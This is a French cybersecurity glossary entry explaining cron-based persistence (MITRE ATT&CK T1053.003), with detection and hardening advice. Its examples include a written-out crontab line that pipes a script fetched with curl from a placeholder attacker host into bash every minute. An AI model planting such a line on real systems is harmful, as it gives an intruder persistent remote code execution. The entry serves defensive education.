Persistance via cron
Qu'est-ce que Persistance via cron ?
Persistance via cronTechnique de persistance Linux/Unix utilisant cron, anacron ou les timers systemd pour réexécuter du code attaquant à un intervalle ou un événement choisi.
La persistance via cron (MITRE ATT&CK T1053.003) cible le démon cron et ses variantes (anacron, fcron, timers systemd). Les attaquants ajoutent des entrées dans /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ ou les crontabs utilisateur (crontab -e). Les charges typiques sont des reverse shells en une ligne, des téléchargements curl ou des scripts placés dans /tmp. Comme cron s'exécute en root ou sous l'utilisateur concerné, la technique est fiable et triviale après l'accès initial. Détection : intégrité des répertoires cron, surveillances auditd, baseline des tâches attendues, alertes EDR sur les shells engendrés par cron. Durcissement : limiter l'accès à crontab, monter /tmp en noexec, activer l'audit systemd-cron lorsque disponible.
● Exemples
- 01
Ajouter * * * * * curl -s http://attaquant/sh | bash à /etc/cron.d/update.
- 02
Déposer un script dans /etc/cron.hourly/ pour rétablir un reverse shell toutes les heures.
● Questions fréquentes
Qu'est-ce que Persistance via cron ?
Technique de persistance Linux/Unix utilisant cron, anacron ou les timers systemd pour réexécuter du code attaquant à un intervalle ou un événement choisi. Cette notion relève de la catégorie Attaques et menaces en cybersécurité.
Que signifie Persistance via cron ?
Technique de persistance Linux/Unix utilisant cron, anacron ou les timers systemd pour réexécuter du code attaquant à un intervalle ou un événement choisi.
Comment fonctionne Persistance via cron ?
La persistance via cron (MITRE ATT&CK T1053.003) cible le démon cron et ses variantes (anacron, fcron, timers systemd). Les attaquants ajoutent des entrées dans /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ ou les crontabs utilisateur (crontab -e). Les charges typiques sont des reverse shells en une ligne, des téléchargements curl ou des scripts placés dans /tmp. Comme cron s'exécute en root ou sous l'utilisateur concerné, la technique est fiable et triviale après l'accès initial. Détection : intégrité des répertoires cron, surveillances auditd, baseline des tâches attendues, alertes EDR sur les shells engendrés par cron. Durcissement : limiter l'accès à crontab, monter /tmp en noexec, activer l'audit systemd-cron lorsque disponible.
Comment se défendre contre Persistance via cron ?
Les défenses contre Persistance via cron combinent habituellement des contrôles techniques et des pratiques opérationnelles, comme détaillé dans la définition ci-dessus.
Quels sont les autres noms de Persistance via cron ?
Noms alternatifs courants : Persistance crontab, Persistance anacron.
● Termes liés
- attacks№ 610
Détournement LD_PRELOAD
Technique Linux de persistance et de détournement de bibliothèque qui exploite la variable LD_PRELOAD ou /etc/ld.so.preload pour injecter du code dans les processus liés dynamiquement.
- attacks№ 608
Persistance launchd
Technique de persistance macOS qui installe un plist LaunchDaemon ou LaunchAgent pour faire exécuter du code par launchd au démarrage, à l'ouverture de session ou sur un déclencheur.
- attacks№ 975
Persistance par tâche planifiée
Technique de persistance et d'exécution où l'attaquant crée ou modifie une tâche planifiée Windows pour lancer son code lors d'un déclencheur (logon, démarrage, minuterie).
- attacks№ 1246
Persistance par souscription d'événement WMI
Technique de persistance qui enregistre un filtre et un consommateur d'événements WMI permanents pour exécuter du code attaquant lors d'un événement système choisi.
- attacks№ 914
Persistance par clé Run du registre
Technique classique de persistance Windows qui ajoute une entrée sous une clé Run ou RunOnce afin d'exécuter un binaire ou un script à chaque ouverture de session.